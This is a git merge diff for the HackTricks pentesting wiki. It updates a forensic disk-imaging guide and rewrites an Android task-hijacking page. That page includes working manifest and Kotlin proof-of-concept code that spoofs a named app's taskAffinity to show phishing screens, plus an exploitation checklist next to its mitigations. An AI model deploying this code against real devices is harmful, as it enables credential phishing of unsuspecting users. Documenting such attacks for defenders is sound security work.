Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/SUMMARY.md

@@ -423,6 +423,7 @@
   - [Joomla](network-services-pentesting/pentesting-web/joomla.md)
   - [JSP](network-services-pentesting/pentesting-web/jsp.md)
   - [Laravel](network-services-pentesting/pentesting-web/laravel.md)
+  - [Microsoft Sharepoint](network-services-pentesting/pentesting-web/microsoft-sharepoint.md)
   - [Moodle](network-services-pentesting/pentesting-web/moodle.md)
   - [NextJS](network-services-pentesting/pentesting-web/nextjs.md)
   - [Nginx](network-services-pentesting/pentesting-web/nginx.md)

src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md

@@ -5,114 +5,173 @@
 
 ## Acquisition
 
+> Always acquire **read-only** and **hash while you copy**. Keep the original device **write-blocked** and work only on verified copies.
+
 ### DD
 
 ```bash
-#This will generate a raw copy of the disk
-dd if=/dev/sdb of=disk.img
+# Generate a raw, bit-by-bit image (no on-the-fly hashing)
+dd if=/dev/sdb of=disk.img bs=4M status=progress conv=noerror,sync
+# Verify integrity afterwards
+sha256sum disk.img > disk.img.sha256
+```
+
+### dc3dd / dcfldd
+
+`dc3dd` is the actively maintained fork of dcfldd (DoD Computer Forensics Lab dd).
+
+```bash
+# Create an image and calculate multiple hashes at acquisition time
+sudo dc3dd if=/dev/sdc of=/forensics/pc.img hash=sha256,sha1 hashlog=/forensics/pc.hashes log=/forensics/pc.log bs=1M
+```
+
+### Guymager  
+Graphical, multithreaded imager that supports **raw (dd)**, **EWF (E01/EWFX)** and **AFF4** output with parallel verification. Available in most Linux repos (`apt install guymager`).
+
+```bash
+# Start in GUI mode
+sudo guymager
+# Or acquire from CLI (since v0.9.5)
+sudo guymager --simulate --input /dev/sdb --format EWF --hash sha256 --output /evidence/drive.e01
 ```
 
-### dcfldd
+### AFF4 (Advanced Forensics Format 4)
+
+AFF4 is Google’s modern imaging format designed for *very* large evidence (sparse, resumable, cloud-native).
 
 ```bash
-#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
-dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
-dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
+# Acquire to AFF4 using the reference tool
+pipx install aff4imager
+sudo aff4imager acquire /dev/nvme0n1 /evidence/nvme.aff4 --hash sha256
+
+# Velociraptor can also acquire AFF4 images remotely
+velociraptor --config server.yaml frontend collect --artifact Windows.Disk.Acquire --args device="\\.\\PhysicalDrive0" format=AFF4
 ```
 
-### FTK Imager
+### FTK Imager (Windows & Linux)
+
+You can [download FTK Imager](https://accessdata.com/product-download) and create **raw, E01 or AFF4** images:
+
+```bash
+ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 \
+          --description 'Laptop seizure 2025-07-22' --examiner 'AnalystName' --compress 6
+```
 
-You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
+### EWF tools (libewf)
 
 ```bash
-ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
+sudo ewfacquire /dev/sdb -u evidence -c 1 -d "Seizure 2025-07-22" -e 1 -X examiner --format encase6 --compression best
 ```
 
-### EWF
+### Imaging Cloud Disks
 
-You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf).
+*AWS* – create a **forensic snapshot** without shutting down the instance:
 
 ```bash
-ewfacquire /dev/sdb
-#Name: evidence
-#Case number: 1
-#Description: A description for the case
-#Evidence number: 1
-#Examiner Name: Your name
-#Media type: fixed
-#Media characteristics: physical
-#File format: encase6
-#Compression method: deflate
-#Compression level: fast
-
-#Then use default values
-#It will generate the disk image in the current directory
+aws ec2 create-snapshot --volume-id vol-01234567 --description "IR-case-1234 web-server 2025-07-22"
+# Copy the snapshot to S3 and download with aws cli / aws snowball
 ```
 
+*Azure* – use `az snapshot create` and export to a SAS URL.  See the HackTricks page {{#ref}}
+../../cloud/azure/azure-forensics.md
+{{#endref}}
+
+
 ## Mount
 
-### Several types
+### Choosing the right approach
 
-In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
+1. Mount the **whole disk** when you want the original partition table (MBR/GPT).
+2. Mount a **single partition file** when you only need one volume.
+3. Always mount **read-only** (`-o ro,norecovery`) and work on **copies**.
 
-### Raw
+### Raw images (dd, AFF4-extracted)
 
 ```bash
-#Get file type
-file evidence.img
-evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files)
+# Identify partitions
+fdisk -l disk.img
+
+# Attach the image to a network block device (does not modify the file)
+sudo modprobe nbd max_part=16
+sudo qemu-nbd --connect=/dev/nbd0 --read-only disk.img
 
-#Mount it
-mount evidence.img /mnt
+# Inspect partitions
+lsblk /dev/nbd0 -o NAME,SIZE,TYPE,FSTYPE,LABEL,UUID
+
+# Mount a partition (e.g. /dev/nbd0p2)
+sudo mount -o ro,uid=$(id -u) /dev/nbd0p2 /mnt
 ```
 
-### EWF
+Detach when finished:
+```bash
+sudo umount /mnt && sudo qemu-nbd --disconnect /dev/nbd0
+```
+
+### EWF (E01/EWFX)
 
 ```bash
-#Get file type
-file evidence.E01
-evidence.E01: EWF/Expert Witness/EnCase image file format
-
-#Transform to raw
-mkdir output
-ewfmount evidence.E01 output/
-file output/ewf1
-output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files)
-
-#Mount
-mount output/ewf1 -o ro,norecovery /mnt
+# 1. Mount the EWF container
+mkdir /mnt/ewf
+ewfmount evidence.E01 /mnt/ewf
+
+# 2. Attach the exposed raw file via qemu-nbd (safer than loop)
+sudo qemu-nbd --connect=/dev/nbd1 --read-only /mnt/ewf/ewf1
+
+# 3. Mount the desired partition
+sudo mount -o ro,norecovery /dev/nbd1p1 /mnt/evidence
 ```
 
-### ArsenalImageMounter
+Alternatively convert on the fly with **xmount**:
 
-It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
+```bash
+xmount --in ewf evidence.E01 --out raw /tmp/raw_mount
+mount -o ro /tmp/raw_mount/image.dd /mnt
+```
 
-### Errors
+### LVM / BitLocker / VeraCrypt volumes
 
-- **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
-- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:
+After attaching the block device (loop or nbd):
 
 ```bash
-fdisk -l disk.img
-Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
-Units: sectors of 1 * 512 = 512 bytes
-Sector size (logical/physical): 512 bytes / 512 bytes
-I/O size (minimum/optimal): 512 bytes / 512 bytes
-Disklabel type: dos
-Disk identifier: 0x00495395
-
-Device        Boot Start    End Sectors  Size Id Type
-disk.img1       2048 208895  206848  101M  1 FAT12
+# LVM
+sudo vgchange -ay               # activate logical volumes
+sudo lvscan | grep "/dev/nbd0"
+
+# BitLocker (dislocker)
+sudo dislocker -V /dev/nbd0p3 -u -- /mnt/bitlocker
+sudo mount -o ro /mnt/bitlocker/dislocker-file /mnt/evidence
 ```
 
-Note that sector size is **512** and start is **2048**. Then mount the image like this:
+### kpartx helpers
+
+`kpartx` maps partitions from an image to `/dev/mapper/` automatically:
 
 ```bash
-mount disk.img /mnt -o ro,offset=$((2048*512))
+sudo kpartx -av disk.img  # creates /dev/mapper/loop0p1, loop0p2 …
+mount -o ro /dev/mapper/loop0p2 /mnt
 ```
 
+### Common mount errors & fixes
 
-{{#include ../../banners/hacktricks-training.md}}
+| Error | Typical Cause | Fix |
+|-------|---------------|-----|
+| `cannot mount /dev/loop0 read-only` | Journaled FS (ext4) not cleanly unmounted | use `-o ro,norecovery` |
+| `bad superblock …` | Wrong offset or damaged FS | calculate offset (`sector*size`) or run `fsck -n` on a copy |
+| `mount: unknown filesystem type 'LVM2_member'` | LVM container | activate volume group with `vgchange -ay` |
+
+### Clean-up
 
+Remember to **umount** and **disconnect** loop/nbd devices to avoid leaving dangling mappings that can corrupt further work:
 
+```bash
+umount -Rl /mnt/evidence
+kpartx -dv /dev/loop0  # or qemu-nbd --disconnect /dev/nbd0
+```
 
+
+## References
+
+- AFF4 imaging tool announcement & specification: https://github.com/aff4/aff4  
+- qemu-nbd manual page (mounting disk images safely): https://manpages.debian.org/qemu-system-common/qemu-nbd.1.en.html
+
+{{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md

@@ -15,42 +15,89 @@ Here's a quick breakdown of activity transitions:
 
 ![https://developer.android.com/images/fundamentals/diagram_backstack.png](<../../images/image (698).png>)
 
-## Task affinity attack
-
-### Overview of Task Affinity and Launch Modes
-
-In Android applications, **task affinity** specifies an activity's preferred task, aligning typically with the app's package name. This setup is instrumental in crafting a proof-of-concept (PoC) app for demonstrating the attack.
-
-### Launch Modes
-
-The `launchMode` attribute directs the handling of activity instances within tasks. The **singleTask** mode is pivotal for this attack, dictating three scenarios based on the existing activity instances and task affinity matches. The exploit hinges on the ability of an attacker's app to mimic the target app's task affinity, misleading the Android system into launching the attacker's app instead of the intended target.
-
-### Detailed Attack Steps
-
-1. **Malicious App Installation**: The victim installs the attacker's app on their device.
-2. **Initial Activation**: The victim first opens the malicious app, setting up the device for the attack.
-3. **Target App Launch Attempt**: The victim attempts to open the target app.
-4. **Hijack Execution**: At some point the app tries to open the **singleTask** view. Due to the matching task affinity, the malicious app is launched in place of the target app.
-5. **Deception**: The malicious app presents a fake login screen resembling the target app, tricking the user into entering sensitive information.
-
-> [!TIP]
-> Note that for this attack to work the vulnerable view **doesn't need to have exported to true** nor it needs to be the Main activity.
-
-For a practical implementation of this attack, refer to the Task Hijacking Strandhogg repository on GitHub: [Task Hijacking Strandhogg](https://github.com/az0mb13/Task_Hijacking_Strandhogg).
-
-### Prevention Measures
-
-To prevent such attacks, developers can:
-- Set **`**taskAffinity`** of the **singleTask** view to an empty string (`android:taskAffinity=""`)
-- Opt for the **`singleInstance`** launch mode, ensuring their app's isolation from others.
-- Customize the **`onBackPressed()`** function offers additional protection against task hijacking.
-
-## **References**
-
-- [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/)
-- [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)
+---
+
+## Task affinity attacks
+
+`taskAffinity` tells Android which task an `Activity` would *prefer* to belong to.  When two activities share the same affinity **Android is allowed to merge them inside the same back-stack even if they come from different APKs**.
+
+If an attacker can place a malicious activity at the **root** of that stack, every time the victim opens the legitimate application the malicious UI will be the first thing the user sees – perfect for phishing or abusive permission requests.
+
+The attack surface is wider than many developers think because **every activity automatically inherits an affinity equal to the application package name** (unless the developer sets `android:taskAffinity=""`).  Therefore *doing nothing* already leaves the app open to task hijacking on Android versions prior to 11.
+
+### Classic "singleTask / StrandHogg" scenario
+
+1. The attacker declares an activity with:
+   ```xml
+   <activity android:name=".EvilActivity"
+             android:exported="true"
+             android:taskAffinity="com.victim.package"
+             android:launchMode="singleTask" >
+       <intent-filter>
+           <action android:name="android.intent.action.MAIN"/>
+           <category android:name="android.intent.category.LAUNCHER"/>
+       </intent-filter>
+   </activity>
+   ```
+2. The malicious app is started once so that the task (with the spoofed affinity) exists in recent tasks.
+3. When the user later opens the real application, Android finds there is already a task whose **root affinity matches the package** and just brings that task to the foreground.
+4. The attacker’s UI is shown first.
+
+### Default–Affinity (no `singleTask`) variant  – Caller ID case study
+
+The vulnerability reported in the **Caller ID (caller.id.phone.number.block)** application shows that the attack *also* works against the default `standard` launch mode:
+
+1. Attacker application creates a fake root activity and immediately hides itself:
+   ```kotlin
+   class HackActivity : AppCompatActivity() {
+       override fun onCreate(savedInstanceState: Bundle?) {
+           super.onCreate(savedInstanceState)
+           moveTaskToBack(true)   // keep the task in recents but out of sight
+       }
+   }
+   ```
+2. The manifest only needs to copy the victim package into `taskAffinity`:
+   ```xml
+   <activity android:name=".HackActivity"
+             android:exported="true"
+             android:taskAffinity="com.caller.id.phone.number.block" >
+       <intent-filter>
+           <action android:name="android.intent.action.MAIN"/>
+           <category android:name="android.intent.category.LAUNCHER"/>
+       </intent-filter>
+   </activity>
+   ```
+3. As soon as the user installs and opens the malicious app **once**, a task whose affinity equals the victim package exists (but sits in the background).
+4. When the real Caller ID application is launched, Android re-uses that task and brings `HackActivity` to the foreground → phishing window/permission abuse.
+
+> NOTE: Starting with **Android 11 (API 30)** the system does *not* place two packages that are not part of the same UID into the same task by default, mitigating this particular variant.  Older versions remain vulnerable.
+
+---
+
+## Detection & Exploitation checklist
+
+1. Pull `AndroidManifest.xml` from the target APK and check that each `<activity>` (or the global `<application>` element) contains `android:taskAffinity=""` (empty) **or** a customised value.
+2. If not, craft a malicious app:
+   - `android:taskAffinity` = victim package name.
+   - Provide a `MAIN/LAUNCHER` intent so the user can open it once.
+   - Optionally call `moveTaskToBack(true)` to hide immediately.
+3. Let the victim open their legitimate application → hijack.
+
+## Mitigation
+
+Developers should:
+
+* Explicitly set `android:taskAffinity=""` at the `<application>` level (recommended) **or** give each activity a unique, private affinity.
+* For highly sensitive screens, combine the above with `android:launchMode="singleInstance"` or modern [`setLaunchMode`](https://developer.android.com/reference/android/content/pm/ActivityInfo#launchMode) protections.
+* Upgrade the app’s `targetSdkVersion` and enforce **Android 11** behavioural changes where tasks are not shared across packages by default.
+
+---
+
+## References
+
+- [https://blog.dixitaditya.com/android-task-hijacking/](https://blog.dixitaditya.com/android-task-hijacking/)
+- [https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)
+- [Android Manifest Misconfiguration Leading to Task Hijacking in Caller ID app](https://github.com/KMov-g/androidapps/blob/main/caller.id.phone.number.block.md)
+- [https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06](https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-